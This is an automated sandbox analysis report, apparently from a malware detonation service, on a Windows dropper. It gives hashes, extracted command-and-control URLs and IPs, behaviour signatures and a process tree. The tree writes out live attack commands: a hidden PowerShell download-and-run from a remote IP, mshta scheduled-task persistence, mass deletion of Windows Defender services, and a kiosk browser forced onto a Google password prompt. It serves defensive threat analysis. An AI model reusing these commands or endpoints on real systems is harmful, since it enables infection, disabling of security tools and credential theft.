Analysis
-
max time kernel
140s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
-
submitted
04/04/2025, 09:38
General
-
Target
2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
-
Size
938KB
-
MD5
13cefe1fe0ec8a50500e8077af765a55
-
SHA1
9fc255b158387a4b0a68c55d302c72a650d25c92
-
SHA256
f7ff070fae36f647e1f1e3f38c05af36c1d63bb77dcce832081667043eded7ed
-
SHA512
532c43531f3d4b68a1c678e8e9dbf6571b38ce70fa3c28a614c68e26877d0f5b37c4743983454b25c8cda75e7ef9355ed73d70c86291281a938d7c406348c2a9
-
SSDEEP
24576:XqDEvCTbMWu7rQYlBQcBiT6rprG8a08u:XTvC/MTQYxsWR7a08
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
gcleaner
185.156.73.98
45.91.200.135
Extracted
lumma
https://rlxspoty.run/nogoaz
https://jrxsafer.top/shpaoz
https://zkrxspint.digital/kendwz
https://rhxhube.run/pogrs
https://grxeasyw.digital/xxepw
https://advennture.top/GKsiio
https://targett.top/dsANGt
https://xrfxcaseq.live/gspaz
https://ywmedici.top/noagis
https://gkrxspint.digital/kendwz
https://erhxhube.run/pogrs
https://0scenarisacri.top/gHSAYuqo
https://njrxsafer.top/shpaoz
https://mywmedici.top/noagis
https://tacticaltalks.live/glKShay
https://metalsyo.digital/opsa
https://iironloxp.live/aksdd
https://navstarx.shop/FoaJSi
https://starcloc.bet/GOksAo
https://spacedbv.world/EKdlsk
Extracted
darkvision
82.29.67.160
-
url
http://107.174.192.179/data/003
https://grabify.link/ZATFQO
http://107.174.192.179/clean
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Signatures
-
Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
-
Amadey family
-
DarkVision Rat
DarkVision Rat is a trojan written in C++.
-
Darkvision family
-
Detects Healer an antivirus disabler dropper 3 IoCs
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Gcleaner family
-
Healer
Healer an antivirus disabler dropper.
-
Healer family
-
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
-
Lumma family
-
Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
-
Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
-
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
-
Modifies security service 2 TTPs 2 IoCs
-
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
-
Stormkitty family
-
Contacts a large (3219) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 22 IoCs
-
Drops file in Drivers directory 2 IoCs
-
Possible privilege escalation attempt 2 IoCs
-
Sets service image path in registry 2 TTPs 2 IoCs
-
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 22 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 9 IoCs
Looks up country code configured in the registry, likely geofence.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 35 IoCs
-
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
-
Impair Defenses: Safe Mode Boot 1 TTPs 3 IoCs
-
Loads dropped DLL 15 IoCs
-
Modifies file permissions 1 TTPs 2 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Adds Run key to start application 2 TTPs 7 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 19 IoCs
-
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
-
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Kills process with taskkill 5 IoCs
-
Modifies registry class 1 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs ping.exe 1 TTPs 8 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 3 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 22 IoCs
-
Suspicious use of FindShellTrayWindow 39 IoCs
-
Suspicious use of SendNotifyMessage 33 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-04_13cefe1fe0ec8a50500e8077af765a55_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn rO55XmauBz1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\vWHzVHlrk.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn rO55XmauBz1 /tr "mshta C:\Users\Admin\AppData\Local\Temp\vWHzVHlrk.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\vWHzVHlrk.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'4TZUWY4HCOP7690OSTXYWSGYB9FEWQSO.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp4TZUWY4HCOP7690OSTXYWSGYB9FEWQSO.EXE"C:\Users\Admin\AppData\Local\Temp4TZUWY4HCOP7690OSTXYWSGYB9FEWQSO.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\10444950101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10444950101\apple.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\262.exe"C:\Users\Admin\AppData\Local\Temp\262.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7636.tmp\7637.tmp\7638.bat C:\Users\Admin\AppData\Local\Temp\262.exe"8⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\262.exe"C:\Users\Admin\AppData\Local\Temp\262.exe" go9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\77DC.tmp\77DD.tmp\77DE.bat C:\Users\Admin\AppData\Local\Temp\262.exe go"10⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\timeout.exetimeout /t 111⤵
- Delays execution with timeout.exe
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc start ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t11⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "Sense"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "Sense"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f11⤵
- Modifies security service
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"11⤵
- Launches sc.exe
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f11⤵
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f11⤵
-
-
C:\Windows\system32\sc.exesc stop ddrver11⤵
- Launches sc.exe
-
-
C:\Windows\system32\sc.exesc delete ddrver11⤵
- Launches sc.exe
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444960101\a045841284.exe"C:\Users\Admin\AppData\Local\Temp\10444960101\a045841284.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10444960101\a045841284.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444970101\632e71067f.exe"C:\Users\Admin\AppData\Local\Temp\10444970101\632e71067f.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10444970101\632e71067f.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Local\Temp\10444980101\c563dfa5e9.exe"C:\Users\Admin\AppData\Local\Temp\10444980101\c563dfa5e9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10444990101\417db29366.exe"C:\Users\Admin\AppData\Local\Temp\10444990101\417db29366.exe"6⤵
- Checks BIOS information in registry
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\10445000101\b32260520c.exe"C:\Users\Admin\AppData\Local\Temp\10445000101\b32260520c.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T7⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking8⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1768 -prefsLen 27099 -prefMapHandle 1988 -prefMapSize 270279 -ipcHandle 2076 -initialChannelId {ae8158e0-99db-4940-9002-dc1cf8effdba} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2472 -prefsLen 27135 -prefMapHandle 2476 -prefMapSize 270279 -ipcHandle 2480 -initialChannelId {1cd042b3-d35b-472d-9336-5b8a5e6b6b3a} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3924 -prefsLen 25164 -prefMapHandle 3928 -prefMapSize 270279 -jsInitHandle 3932 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3940 -initialChannelId {7e0c3f26-8047-43b1-a3db-ab4768098813} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab9⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4116 -prefsLen 27276 -prefMapHandle 4120 -prefMapSize 270279 -ipcHandle 4080 -initialChannelId {d3618ac0-43c3-444e-977c-5c59e785b919} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd9⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4348 -prefsLen 34775 -prefMapHandle 4352 -prefMapSize 270279 -jsInitHandle 4356 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 2968 -initialChannelId {da5f6127-e2c4-4873-b878-000644b4735a} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab9⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5000 -prefsLen 35012 -prefMapHandle 4996 -prefMapSize 270279 -ipcHandle 5028 -initialChannelId {266ab5b5-f5d4-4374-8883-7387ecbbd4a6} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility9⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5220 -prefsLen 32952 -prefMapHandle 5224 -prefMapSize 270279 -jsInitHandle 5228 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5236 -initialChannelId {c5f2e4db-1465-4d46-aca4-32e35d506ceb} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab9⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 4504 -prefsLen 32952 -prefMapHandle 5356 -prefMapSize 270279 -jsInitHandle 5360 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5384 -initialChannelId {145c0096-5f72-4a5b-afd7-7237314cf363} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab9⤵
- Checks processor information in registry
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5364 -prefsLen 32952 -prefMapHandle 5004 -prefMapSize 270279 -jsInitHandle 5372 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5444 -initialChannelId {1c89cdad-de43-4292-9d0e-89fb8f693714} -parentPid 2136 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2136" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab9⤵
- Checks processor information in registry
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445010101\42b2d91295.exe"C:\Users\Admin\AppData\Local\Temp\10445010101\42b2d91295.exe"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\10445020101\qhjMWht.exe"C:\Users\Admin\AppData\Local\Temp\10445020101\qhjMWht.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Local\Temp\10445030101\ICQ0sog.exe"C:\Users\Admin\AppData\Local\Temp\10445030101\ICQ0sog.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
-
C:\Users\Admin\AppData\Local\Temp\10445040101\larBxd7.exe"C:\Users\Admin\AppData\Local\Temp\10445040101\larBxd7.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat7⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 6899128⤵
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Exclusion.psd8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "users" Findarticles8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 689912\Jordan.com + Bg + Batteries + Boss + Illustrations + Boards + Within + Pushed + Brunei + Dead 689912\Jordan.com8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Customized.psd + ..\Permits.psd + ..\Teeth.psd + ..\Feel.psd + ..\Nonprofit.psd + ..\Shoes.psd + ..\Bruce.psd b8⤵
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\689912\Jordan.comJordan.com b8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
